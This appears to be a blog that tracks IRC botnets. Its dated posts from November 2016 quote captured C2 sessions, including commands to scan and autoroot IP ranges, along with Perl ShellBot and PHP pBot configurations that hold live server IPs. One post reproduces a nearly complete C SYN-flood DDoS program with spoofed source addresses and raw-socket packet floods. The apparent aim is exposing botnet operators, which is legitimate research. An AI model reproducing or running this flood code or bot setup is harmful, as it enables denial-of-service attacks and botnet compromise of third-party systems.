>> NICK raGe|cjxtdsvUOE
>> USER mnquru "fo1.net" "rage" :mnquru
<< NOTICE AUTH :*** eh...
<< 001 raGe|cjxtdsvUOE
<< 002 raGe|cjxtdsvUOE
<< 003 raGe|cjxtdsvUOE
<< 004 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 422 raGe|cjxtdsvUOE :MOTD File is missing
<< MODE raGe|cjxtdsvUOE :+iwG
<< JOIN :#!b!#
>> JOIN #vnc #vnc
<< JOIN :#vnc
<< 332 raGe|cjxtdsvUOE #vnc :.xpl 94 1 23.26.x.x 3 1 23.26.x.x 3 1 / .scan 94 1 23.26.x.x 3 1 23.26.255.255 3 1
<< 333 raGe|cjxtdsvUOE #vnc akanz 1480289648
>> PRIVMSG #vnc :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 23.26.x.x with 94 threads. (autorooting)
>> PING :NhG.server
>> PONG NhG.server
>> JOIN #vnc #vnc
Monday, November 28, 2016
ragebot - scan1.zapto.org - t0nixx [SKID]
Saturday, November 19, 2016
5k - Perl/ShellBot.B ddos - IRC
# TeaMrx Perlbot vS xeQT
my @mast3rs = ("Low","Loww");
my @admchan=("#Perli");
$servidor='188.119.151.131' unless $servidor; // his server
my $xeqt = "!x";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;
my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"spamd child",
"httpd");
my @nickname = ("TeaMrx","......","xQt");
my @xident = ("noway",......yn","ju");
my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");
#################
# Random Ports
#################
my @rports = ("6667");
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00 - he tries to tell me what I put inside of me - \001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1á9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");
# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
# xeQt
#my $nick = "sshb0t1";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'vSm0d (C) TeaMrx';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
sub getnick {
return "$nickname[rand scalar @nickname]".int(rand(1000));
}
neeedd to delete some shit coz site gets blacklisted
}
ahh found this in his spreaading ftp maybe interesting to someone ....
/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include unistd.h
#include time.h
#include sys/types.h
#include sys/socket.h
#include sys/ioctl.h
#include string.h
#include stdlib.h
#include stdio.h
#include pthread.h
#include netinet/tcp.h
#include netinet/ip.h
#include netinet/in.h
#include netinet/if_ether.h
#include netdb.h
#include net/if.h
#include arpa/inet.h
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = 0;
tcph->res2 = 3;
tcph->doff = 5;
tcph->syn = 1;
tcph->window = htonl(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s Sunday, November 13, 2016
pBot Skidd - 93.158.200.94 - IRC
// users
9/tcp open irc Unreal ircd
| irc-info:
| server: irc.MoneyZ.gov.GoV
| version: Unreal3.2.10.2. irc.MoneyZ.gov.GoV
| servers: 1
| chans: 2
| users: 246
| lservers: 0
| lusers: 246
//confg
class pBot
{
var $config = array("server"=>"93.158.200.94", "port"=>"9", "key"=>"", "prefix"=>"botID", "maxrand"=>"8", "chan"=>"#-|Bots", "trigger"=>"", "password"=>"", "auth"=>"MoneyZ.gov");
var $users = array();
function start() {
while(true)
{
Saturday, November 12, 2016
Bot - l.lolole.net - IRC
DNS : l.lolole.net
<< NOTICE AUTH :*** Looking up your hostname...
<< NOTICE AUTH :*** Found your hostname
>> USER dk dk dk dk
>> NICK dkacoxfdb
<< 001 dkacoxfdb
<< 002 dkacoxfdb : M0dded by uNkn0wn Crew
<< 003 dkacoxfdb
<< 004 dkacoxfdb : www.uNkn0wn.eu - iD@uNkn0wn.eu
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 422 dkacoxfdb :MOTD File is missing
<< MODE dkacoxfdb :+iwG
>> JOIN #k
<< JOIN :#k
>> PING :E.tk
>> PONG :E.tk
Subscribe to:
Posts (Atom)